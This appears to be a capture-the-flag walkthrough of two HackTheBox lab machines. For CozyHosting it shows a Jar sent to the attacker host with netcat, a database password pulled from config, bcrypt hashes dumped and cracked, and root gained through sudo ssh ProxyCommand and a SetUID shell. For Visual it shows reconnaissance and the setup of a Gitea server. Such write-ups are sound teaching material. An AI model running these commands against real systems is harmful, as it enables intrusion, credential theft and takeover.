app@cozyhosting:/app$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
app@cozyhosting:/app$ ^Z
[1]+ Stopped nc -lnvp 443
oxdf@hacky$ stty raw -echo; fg
nc -lnvp 443
reset
reset: unknown terminal type unknown
Terminal type? screen
app@cozyhosting:/app$
The web application is running out of /app, which contains a Java Jar file:
app@cozyhosting:/app$ ls
cloudhosting-0.0.1.jar
That Jar is running:
app@cozyhosting:/app$ ps auxww | grep cloudhosting
app 1063 0.7 14.9 3672520 599428 ? Ssl Feb26 7:37 /usr/bin/java -jar cloudhosting-0.0.1.jar
That process is listening on 8080:
app@cozyhosting:/app$ netstat -tnlp | grep 1063
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp6 0 0 127.0.0.1:8080 :::* LISTEN 1063/java
And I can see that nginx is forwarding traffic for cozyhosting.htb
to port 8080:
app@cozyhosting:/app$ cat /etc/nginx/sites-enabled/default
server {
listen 80;
return 301 http://cozyhosting.htb;
}
server {
listen 80;
server_name cozyhosting.htb;
location / {
proxy_pass http://localhost:8080;
}
}
There is one user with a home directory, but app cannot access it:
app@cozyhosting:/home$ ls
josh
app@cozyhosting:/home$ cd josh/
bash: cd: josh/: Permission denied
There’s not much else interesting that app can access.
I’m going to take a look at the web application, and there are a couple of approaches that both get to the same information I need to move forward:
flowchart TD;
A[cloudhosting-0.0.1.jar]-->B(Unzip on CozyHosting);
A-->C(Exfil and jd-gui);
B-->D[Find DB Credentials];
C-->D;
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
Jar files are Java Archive files. They contain all the files needed to run the Java application (in this case a web server), and are actually just Zip files. The quick and dirty approach is to take a copy and unzip it for an initial look:
app@cozyhosting:/app$ cp cloudhosting-0.0.1.jar /dev/shm/
app@cozyhosting:/app$ cd /dev/shm/
app@cozyhosting:/dev/shm$ unzip cloudhosting-0.0.1.jar
Archive: cloudhosting-0.0.1.jar
creating: META-INF/
inflating: META-INF/MANIFEST.MF
creating: org/
...[snip]...
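Because a Jar is just a Zip, any zip tool can inspect one. A local sketch using Python’s stdlib zipfile CLI (the demo.jar name and contents here are made up, not the real application):

```shell
# Build a stand-in jar: a zip containing only a manifest
mkdir -p demo/META-INF
printf 'Manifest-Version: 1.0\n' > demo/META-INF/MANIFEST.MF
(cd demo && python3 -m zipfile -c ../demo.jar META-INF/)
# List its contents, much like unzip -l would
python3 -m zipfile -l demo.jar
```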
The entry point for the application is defined in the MANIFEST.MF
file as htb.cloudhosting.CozyHostingApp
:
app@cozyhosting:/dev/shm$ cat META-INF/MANIFEST.MF
Manifest-Version: 1.0
Created-By: Maven JAR Plugin 3.3.0
Build-Jdk-Spec: 17
Implementation-Title: cloudhosting
Implementation-Version: 0.0.1
Main-Class: org.springframework.boot.loader.JarLauncher
Start-Class: htb.cloudhosting.CozyHostingApp
Spring-Boot-Version: 3.0.2
Spring-Boot-Classes: BOOT-INF/classes/
Spring-Boot-Lib: BOOT-INF/lib/
Spring-Boot-Classpath-Index: BOOT-INF/classpath.idx
Spring-Boot-Layers-Index: BOOT-INF/layers.idx
But I’ll save the code analysis for a nicer application. Having all these files allows me to do things like grep for passwords:
app@cozyhosting:/dev/shm$ grep -r password . 2>/dev/null
./BOOT-INF/classes/application.properties:spring.datasource.password=Vg&nvzAQ7XxR
./BOOT-INF/classes/templates/login.html: <input type="password" name="password" class="form-control" id="yourPassword"
./BOOT-INF/classes/templates/login.html: <div class="invalid-feedback">Please enter your password!</div>
./BOOT-INF/classes/templates/login.html: <p th:if="${param.error}" class="text-center small">Invalid username or password</p>
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-fill">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.symbol.svg:</symbol><symbol viewBox="0 0 24 24" id="ri-lock-password-line">
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-fill"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.svg: <glyph glyph-name="lock-password-line"
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.less:.ri-lock-password-line:before { content: "\eed0"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-fill:before { content: "\eecf"; }
./BOOT-INF/classes/static/assets/vendor/remixicon/remixicon.css:.ri-lock-password-line:before { content: "\eed0"; }
The first line has a datasource
password, which looks interesting. I’ll inspect that file:
app@cozyhosting:/dev/shm$ cat BOOT-INF/classes/application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
It’s the database connection information.
To exfil the Jar instead, I’ll start nc listening on my host, redirecting any output into cloudhosting-0.0.1.jar:
oxdf@hacky$ nc -lnvp 443 > cloudhosting-0.0.1.jar
Listening on 0.0.0.0 443
On CozyHosting, I’ll send the Jar into nc
back to my host:
app@cozyhosting:/dev/shm$ cat cloudhosting-0.0.1.jar | nc 10.10.14.6 443
This hangs, but on my host it shows a connection:
oxdf@hacky$ nc -lnvp 443 > cloudhosting-0.0.1.jar
Listening on 0.0.0.0 443
Connection received on 10.10.11.230 48534
After a few seconds, I’ll kill it on my side, and make sure the md5sum
of the two files matches.
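The integrity check is just comparing digests on both ends; a trivial local sketch (filenames made up, with cp standing in for the nc transfer):

```shell
# Receiver's copy must hash identically to the sender's original
printf 'pretend jar bytes' > sent.jar
cp sent.jar received.jar              # stand-in for the nc transfer
md5sum sent.jar received.jar          # the two digests should be identical
```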
I’ll download the jd-gui Jar file and run it with java -jar jd-gui-1.6.6.jar, opening the Jar file. The htb.cloudhosting.CozyHostingApp class just starts the Spring Boot application:
The application.properties
file is right there as well, with the DB info:
I’ll connect to Postgres using the psql
utility installed on CozyHosting:
app@cozyhosting:/$ PGPASSWORD='Vg&nvzAQ7XxR' psql -U postgres -h localhost
psql (14.9 (Ubuntu 14.9-0ubuntu0.22.04.1))
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.
postgres=#
There is really only one interesting database:
postgres=# \list
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)
It has two tables, hosts
and users
:
cozyhosting=# \dt
List of relations
Schema | Name | Type | Owner
--------+-------+-------+----------
public | hosts | table | postgres
public | users | table | postgres
(2 rows)
The hosts
table isn’t interesting, but the users
table has hashes in it:
cozyhosting=# select * from users;
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)
I’ll make a hashes
file with those two hashes:
$ cat hashes
kanderson:$2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim
admin:$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm
hashcat
isn’t able to automatically detect the hash type:
$ hashcat hashes --user /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting
...[snip]...
The following 4 hash-modes match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
25600 | bcrypt(md5($pass)) / bcryptmd5 | Forums, CMS, E-Commerce
25800 | bcrypt(sha1($pass)) / bcryptsha1 | Forums, CMS, E-Commerce
28400 | bcrypt(sha512($pass)) / bcryptsha512 | Forums, CMS, E-Commerce
Please specify the hash-mode with -m [hash-mode].
...[snip]...
I’m including --user
because my hashes have [username]:
at the front of each line.
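bcrypt hashes are self-describing, which is why hashcat can narrow the type down to the bcrypt family: the version and cost factor are encoded right in the string. A quick POSIX-shell parse of the admin hash:

```shell
# Format: $<version>$<cost>$<22-char salt><31-char hash>, fields split on $
hash='$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm'
printf 'version: %s\n' "$(printf '%s' "$hash" | cut -d'$' -f2)"   # -> 2a
printf 'cost:    %s\n' "$(printf '%s' "$hash" | cut -d'$' -f3)"   # -> 10 (2^10 rounds)
```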
3200 is the most generic type, so I’ll start with that:
$ hashcat hashes --user -m 3200 /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting
...[snip]...
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
...[snip]...
admin’s password is “manchesterunited”.
The other user on the box is josh, and that password works with su
:
app@cozyhosting:/$ su - josh
Password:
josh@cozyhosting:~$
Or I can get a clean shell with SSH:
oxdf@hacky$ sshpass -p manchesterunited ssh josh@cozyhosting.htb
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
...[snip]..
josh@cozyhosting:~$
Either way, I can grab user.txt
:
josh@cozyhosting:~$ cat user.txt
30628c91************************
The josh user can run ssh
as root using sudo
:
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
There’s a GTFObins page for ssh
, but it’s more fun to look at the man page. SSH has an option called ProxyCommand
. I actually use this in real life to connect to SSH servers through a SOCKS proxy. I have an SSH config file that looks like this:
When I run ssh [hostname]
, it runs nc
connecting to localhost:1080
as a SOCKS5 (-X 5
) proxy, and then my SSH connection can travel over that proxy.
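A config like the one described might look like this (the host and proxy details here are placeholders, not my real setup):

```text
# ~/.ssh/config
Host internal-box
    HostName internal-box.example.com
    ProxyCommand nc -X 5 -x localhost:1080 %h %p
```

ssh expands %h and %p to the target host and port before running the ProxyCommand.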
The ProxyCommand
is run on the client before making the connection, so I can abuse that to do arbitrary things as the user who is running the ssh
command. In this case, that’s root because of sudo
. I’ll show touching a file:
josh@cozyhosting:~$ sudo ssh -o ProxyCommand='touch /tmp/0xdf' x
kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
josh@cozyhosting:~$ ls -l /tmp/0xdf
-rw-r--r-- 1 root root 0 Feb 27 18:19 /tmp/0xdf
It works. I can use this to make a SetUID bash
:
josh@cozyhosting:~$ sudo ssh -o ProxyCommand='cp /bin/bash /tmp/0xdf' localhost
kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
josh@cozyhosting:~$ sudo ssh -o ProxyCommand='chmod 6777 /tmp/0xdf' localhost
kex_exchange_identification: Connection closed by remote host
Connection closed by UNKNOWN port 65535
josh@cozyhosting:~$ ls -l /tmp/0xdf
-rwsrwsrwx 1 root root 1396520 Feb 27 18:20 /tmp/0xdf
Now running it (with -p
to not drop privs) gives a root shell:
josh@cozyhosting:~$ /tmp/0xdf -p
0xdf-5.1# id
uid=1003(josh) gid=1003(josh) euid=0(root) egid=0(root) groups=0(root),1003(josh)
GTFObins gives a shorter path, using redirection to get the shell immediately from the ssh
process:
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)
Either way, I can grab the flag:
0xdf-5.1# cat /root/root.txt
01ebd55a************************
Visual is all about abusing a Visual Studio build process. There’s a website that takes a hosted Git URL, fetches the Visual Studio project there, and compiles it. I’ll stand up a Gitea server in a container and host a project with a pre-build action that runs a command and gets a shell. From there, I’ll drop a webshell into the XAMPP web root to get a shell as local service. This service is running without SeImpersonate privileges, but I’ll use the FullPower executable to recover this privilege, and then GodPotato to get System.
Name | Visual Play on HackTheBox |
---|---|
Release Date | 30 Sep 2023 |
Retire Date | 24 Feb 2024 |
OS | Windows |
Base Points | Medium [30] |
Rated Difficulty | |
Radar Graph | |
00:18:48 | |
00:41:19 | |
Creator |
nmap
finds one open TCP port, HTTP (80):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.234
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-20 14:56 EST
Nmap scan report for 10.10.11.234
Host is up (0.092s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 13.63 seconds
oxdf@hacky$ nmap -p 80 -sCV 10.10.11.234
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-20 14:56 EST
Nmap scan report for 10.10.11.234
Host is up (0.091s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
|_http-title: Visual - Revolutionizing Visual Studio Builds
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds
Based on the Apache version, this is a Windows host running a PHP webserver.
The site offers a service that compiles Visual Studio projects:
At the bottom, there’s text field to “Submit Your Repo”:
I know that HTB labs can’t access the internet, but giving it https://github.com/0xdf/test
returns a message that says it’s trying:
This page is at /uploads/bc52b27d25b2eb4fa36827c369fe26/
, and refreshes itself every few seconds, until it shows:
.sln
is the extension for a Visual Studio project file, so that fits the theme.
The site is a PHP site. Submissions go to /submit.php
. The main site loads as http://10.10.11.234/index.php
. Adding index.php
to the end of the uploads
path also loads.
The HTTP response headers don’t give much else of interest:
HTTP/1.1 200 OK
Date: Tue, 20 Feb 2024 20:04:00 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Content-Length: 7534
Connection: close
Content-Type: text/html; charset=UTF-8
The 404 page is the default Apache page:
I’ll run feroxbuster
against the site, and include -x php
since I know the site is PHP:
oxdf@hacky$ feroxbuster -u http://10.10.11.234 -x php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.234
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💲 Extensions │ [php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 30w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 33w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 117l 555w 7534c http://10.10.11.234/
301 GET 9l 30w 335c http://10.10.11.234/css => http://10.10.11.234/css/
301 GET 9l 30w 334c http://10.10.11.234/js => http://10.10.11.234/js/
301 GET 9l 30w 339c http://10.10.11.234/uploads => http://10.10.11.234/uploads/
301 GET 9l 30w 338c http://10.10.11.234/assets => http://10.10.11.234/assets/
403 GET 11l 47w 421c http://10.10.11.234/webalizer
200 GET 117l 555w 7534c http://10.10.11.234/index.php
403 GET 11l 47w 421c http://10.10.11.234/phpmyadmin
301 GET 9l 30w 335c http://10.10.11.234/CSS => http://10.10.11.234/CSS/
301 GET 9l 30w 334c http://10.10.11.234/JS => http://10.10.11.234/JS/
301 GET 9l 30w 339c http://10.10.11.234/Uploads => http://10.10.11.234/Uploads/
301 GET 9l 30w 338c http://10.10.11.234/Assets => http://10.10.11.234/Assets/
503 GET 11l 44w 402c http://10.10.11.234/examples
200 GET 0l 0w 0c http://10.10.11.234/submit.php
301 GET 9l 30w 334c http://10.10.11.234/Js => http://10.10.11.234/Js/
301 GET 9l 30w 335c http://10.10.11.234/Css => http://10.10.11.234/Css/
403 GET 11l 47w 421c http://10.10.11.234/licenses
403 GET 11l 47w 421c http://10.10.11.234/server-status
200 GET 117l 555w 7534c http://10.10.11.234/Index.php
301 GET 9l 30w 339c http://10.10.11.234/UPLOADS => http://10.10.11.234/UPLOADS/
200 GET 0l 0w 0c http://10.10.11.234/Submit.php
403 GET 11l 47w 421c http://10.10.11.234/server-info
[####################] - 3m 360000/360000 0s found:22 errors:675
[####################] - 2m 30000/30000 169/s http://10.10.11.234/
[####################] - 0s 30000/30000 0/s http://10.10.11.234/css/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 0s 30000/30000 0/s http://10.10.11.234/js/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 2m 30000/30000 167/s http://10.10.11.234/uploads/
[####################] - 0s 30000/30000 0/s http://10.10.11.234/assets/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 0s 30000/30000 0/s http://10.10.11.234/CSS/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 0s 30000/30000 0/s http://10.10.11.234/JS/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 2m 30000/30000 169/s http://10.10.11.234/Uploads/
[####################] - 0s 30000/30000 0/s http://10.10.11.234/Assets/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 0s 30000/30000 0/s http://10.10.11.234/Js/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 0s 30000/30000 0/s http://10.10.11.234/Css/ => Directory listing (remove --dont-extract-links to scan)
[####################] - 2m 30000/30000 187/s http://10.10.11.234/UPLOADS/
It makes sense that the directories aren’t case sensitive (standard for Windows). There are 403s for webalizer and phpmyadmin, and a 503 for examples, likely from the default XAMPP configuration.
It seems clear that I need to get the site to fetch and build some kind of malicious Visual Studio project. The first step is to get it to connect to something I control.
I’ll start a Python webserver on my VM and give the site a URL using my HTB VPN IP:
It takes a minute after I submit, but eventually there’s a request:
oxdf@hacky$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.234 - - [20/Feb/2024 15:37:42] code 404, message File not found
10.10.11.234 - - [20/Feb/2024 15:37:42] "GET /test/info/refs?service=git-upload-pack HTTP/1.1" 404 -
To get a better look at that, I’ll kill the webserver, listen on 80 with nc, and send the same URL:
oxdf@hacky$ nc -lnvp 80
Listening on 0.0.0.0 80
Connection received on 10.10.11.234 49677
GET /test/info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.6
User-Agent: git/2.41.0.windows.1
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
Pragma: no-cache
Git-Protocol: version=2
It’s using git to try to get a repository from my server over HTTP.
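Before reaching for a full Git server, it’s worth noting (as a sketch of an alternative, not what I’ll use below) that git’s “dumb” HTTP protocol serves a repo as static files, so in principle a plain web server could host it. All paths here are hypothetical:

```shell
# Sketch: a repo served via git's "dumb" HTTP protocol instead of Gitea.
# Paths and the commit identity are made up for the demo.
rm -rf /tmp/gitserve && mkdir -p /tmp/gitserve
git init -q /tmp/gitserve/test
cd /tmp/gitserve/test
echo 'hello' > README.md
git add README.md
git -c user.name=0xdf -c user.email=0xdf@visual.htb commit -qm 'init'
git update-server-info   # writes .git/info/refs, which dumb-HTTP clients fetch
cd /tmp/gitserve
# python3 -m http.server 80   # then submit http://10.10.14.6/test/.git
```

If the client doesn’t get a smart-protocol advertisement back from the `info/refs` request, it falls back to fetching these static files. Still, a real Git server is more robust, so I’ll go that route.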
I need to host a Git server. Gitea seems as good an option as any. I’ll use Docker to get an instance up and running. First, I’ll pull the image:
oxdf@hacky$ docker pull gitea/gitea:latest
latest: Pulling from gitea/gitea
619be1103602: Pull complete
172dd90f8cd3: Pull complete
e351dffe3e2e: Pull complete
23115583656f: Pull complete
29191722a758: Pull complete
365242e44775: Pull complete
2b8d3024c169: Pull complete
Digest: sha256:a2095ce71c414c0c6a79192f3933e668a595f7fa7706324edd0aa25c8728f00f
Status: Downloaded newer image for gitea/gitea:latest
docker.io/gitea/gitea:latest
Now I’ll run the server, telling Docker to forward port 3000 through to me:
oxdf@hacky$ docker run -p 3000:3000 gitea/gitea
Generating /data/ssh/ssh_host_ed25519_key...
Generating /data/ssh/ssh_host_rsa_key...
2024/02/20 21:00:30 cmd/web.go:242:runWeb() [I] Starting Gitea on PID: 18
2024/02/20 21:00:30 cmd/web.go:111:showWebStartupMessage() [I] Gitea version: 1.21.5 built with GNU Make 4.4.1, go1.21.6 : bindata, timetzdata, sqlite, sqlite_unlock_notify
2024/02/20 21:00:30 cmd/web.go:112:showWebStartupMessage() [I] * RunMode: prod
2024/02/20 21:00:30 cmd/web.go:113:showWebStartupMessage() [I] * AppPath: /usr/local/bin/gitea
2024/02/20 21:00:30 cmd/web.go:114:showWebStartupMessage() [I] * WorkPath: /data/gitea
2024/02/20 21:00:30 cmd/web.go:115:showWebStartupMessage() [I] * CustomPath: /data/gitea
2024/02/20 21:00:30 cmd/web.go:116:showWebStartupMessage() [I] * ConfigFile: /data/gitea/conf/app.ini
2024/02/20 21:00:30 cmd/web.go:117:showWebStartupMessage() [I] Prepare to run install page
Generating /data/ssh/ssh_host_ecdsa_key...
Server listening on :: port 22.
Server listening on 0.0.0.0 port 22.
2024/02/20 21:00:31 cmd/web.go:304:listen() [I] Listen: http://0.0.0.0:3000
2024/02/20 21:00:31 cmd/web.go:308:listen() [I] AppURL(ROOT_URL): http://localhost:3000/
2024/02/20 21:00:31 ...s/graceful/server.go:70:NewServer() [I] Starting new Web server: tcp:0.0.0.0:3000 on PID: 18
Visiting http://127.0.0.1:3000 offers the Gitea setup:
It’s important to create an account at the bottom under “Administrator Account Settings”:
On clicking “Install Gitea”, the page refreshes (and may appear to crash, but on refreshing again) I’ve got a working Gitea instance.
Before I try to exploit this, I want to understand how the application works. I’m going to make a Hello World dummy application and upload it to Visual. I’ll show how to do this both in Windows and on Linux.
flowchart TD;
A["Create in\nVisual Studio\non Windows"]-->B(Run on Visual);
C["Create with\ndotnet\non Linux"]-->B;
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
I’ll create my own Visual Studio project by opening Visual Studio, creating a new project, selecting C# Console App, and giving it the name Hello0xdf:
On the next screen I’ll make sure to pick .NET 6.0 (as that’s what the site on Visual said they support):
In the project that opens, there’s a Program.cs that has a simple print:
This creates a Hello0xdf folder that has a Hello0xdf.sln file in it:
The Hello0xdf folder inside that has the source files, as well as the Hello0xdf.csproj file, which is also important:
If I “Build” -> “Build Solution”, it shows it generates a .dll executable:
Build started at 10:40 AM...
1>------ Build started: Project: Hello0xdf, Configuration: Debug Any CPU ------
1>Hello0xdf -> Z:\hackthebox\visual-10.10.11.234\projects\Hello0xdf\Hello0xdf\bin\Debug\net6.0\Hello0xdf.dll
========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ==========
========== Build completed at 10:40 AM and took 00.724 seconds ==========
There’s actually a bunch of files, including a .exe:
PS > ls
Directory: Z:\hackthebox\visual-10.10.11.234\projects\Hello0xdf\Hello0xdf\bin\Debug\net6.0
Mode LastWriteTime Length Name
---- ------------- ------ ----
------ 2/21/2024 10:41 AM 149504 Hello0xdf.exe
------ 2/21/2024 10:41 AM 10244 Hello0xdf.pdb
------ 2/21/2024 10:40 AM 419 Hello0xdf.deps.json
------ 2/21/2024 10:40 AM 147 Hello0xdf.runtimeconfig.json
------ 2/21/2024 10:41 AM 4608 Hello0xdf.dll
PS > .\Hello0xdf.exe
Hello, 0xdf!
I’ll copy these files back to my Linux host where I’ve got Gitea, and I’ll create a new repo:
I’ll name it “Hello0xdf”, and follow the instructions for creating a new repo around my project:
oxdf@hacky$ git init
Initialized empty Git repository in /media/sf_CTFs/hackthebox/visual-10.10.11.234/projects/Hello0xdf/.git/
oxdf@hacky$ git checkout -b main
Switched to a new branch 'main'
oxdf@hacky$ git add .
oxdf@hacky$ git commit -m "hello 0xdf!"
[main (root-commit) affd06e] hello 0xdf!
30 files changed, 290 insertions(+)
create mode 100644 .vs/Hello0xdf/DesignTimeBuild/.dtbcache.v2
create mode 100644 .vs/Hello0xdf/FileContentIndex/8ce28047-0dfe-46b6-a3af-27764eadc730.vsidx
create mode 100644 .vs/Hello0xdf/v17/.suo
create mode 100644 Hello0xdf.sln
create mode 100644 Hello0xdf/Hello0xdf.csproj
create mode 100644 Hello0xdf/Program.cs
...[snip]...
oxdf@hacky$ git remote add origin http://10.10.14.6:3000/0xdf/Hello0xdf.git
oxdf@hacky$ git push -u origin main
Username for 'http://10.10.14.6:3000': 0xdf
Password for 'http://0xdf@10.10.14.6:3000':
Enumerating objects: 41, done.
Counting objects: 100% (41/41), done.
Delta compression using up to 8 threads
Compressing objects: 100% (34/34), done.
Writing objects: 100% (41/41), 95.20 KiB | 5.60 MiB/s, done.
Total 41 (delta 2), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.10.14.6:3000/0xdf/Hello0xdf.git
* [new branch] main -> main
Branch 'main' set up to track remote branch 'main' from 'origin'.
Now it shows up in Gitea:
If I don’t want to go over to a Windows VM, I can make a project in Linux with dotnet. .NET versioning can be a real pain, so it’s easiest to just use a Docker container specifically for .NET 6, the version the website says it supports (like I did in Keeper). I’ll make a directory for this project, and share it into the container:
oxdf@hacky$ mkdir HelloLinux
oxdf@hacky$ docker run --rm -it -v HelloLinux:/HelloLiunx mcr.microsoft.com/dotnet/sdk:6.0 bash
Unable to find image 'mcr.microsoft.com/dotnet/sdk:6.0' locally
6.0: Pulling from dotnet/sdk
5d0aeceef7ee: Pull complete
7c2bfda75264: Pull complete
950196e58fe3: Pull complete
ecf3c05ee2f6: Pull complete
819f3b5e3ba4: Pull complete
19984358397d: Pull complete
d99f9f96f040: Pull complete
d6d23fc1b8fc: Pull complete
Digest: sha256:fdac9ba57a38ffaa6494b93de33983644c44d9e491e4e312f35ddf926c55a073
Status: Downloaded newer image for mcr.microsoft.com/dotnet/sdk:6.0
root@ef5f5f0ac789:/#
I am mounting the project directory into the container from my host so that I can use the container to make the project, but then use my host to interact with Gitea and not have to worry about networking.
I’ll create a project:
root@ef5f5f0ac789:/HelloLiunx# dotnet new console
The template "Console App" was created successfully.
Processing post-creation actions...
Running 'dotnet restore' on /HelloLiunx/HelloLiunx.csproj...
Determining projects to restore...
Restored /HelloLiunx/HelloLiunx.csproj (in 64 ms).
Restore succeeded.
This creates a project with a Hello World program:
root@ef5f5f0ac789:/HelloLiunx# ls
HelloLiunx.csproj Program.cs obj
root@ef5f5f0ac789:/HelloLiunx# cat Program.cs
// See https://aka.ms/new-console-template for more information
Console.WriteLine("Hello, World!");
Now I need a Visual Studio solution file (.sln):
root@ef5f5f0ac789:/HelloLiunx# dotnet new sln
The template "Solution File" was created successfully.
root@ef5f5f0ac789:/HelloLiunx# ls
HelloLiunx.csproj HelloLiunx.sln Program.cs obj
This creates the .sln file, but doesn’t associate it at all with the .csproj:
root@ef5f5f0ac789:/HelloLiunx# cat HelloLiunx.sln
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.0.31903.59
MinimumVisualStudioVersion = 10.0.40219.1
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
I need to tie these together:
root@ef5f5f0ac789:/HelloLiunx# dotnet sln HelloLiunx.sln add HelloLiunx.csproj
Project `HelloLiunx.csproj` added to the solution.
root@ef5f5f0ac789:/HelloLiunx# cat HelloLiunx.sln
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.0.31903.59
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "HelloLiunx", "HelloLiunx.csproj", "{8851DCFA-2958-4CFF-ACA9-37734A7220F2}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{8851DCFA-2958-4CFF-ACA9-37734A7220F2}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{8851DCFA-2958-4CFF-ACA9-37734A7220F2}.Debug|Any CPU.Build.0 = Debug|Any CPU
{8851DCFA-2958-4CFF-ACA9-37734A7220F2}.Release|Any CPU.ActiveCfg = Release|Any CPU
{8851DCFA-2958-4CFF-ACA9-37734A7220F2}.Release|Any CPU.Build.0 = Release|Any CPU
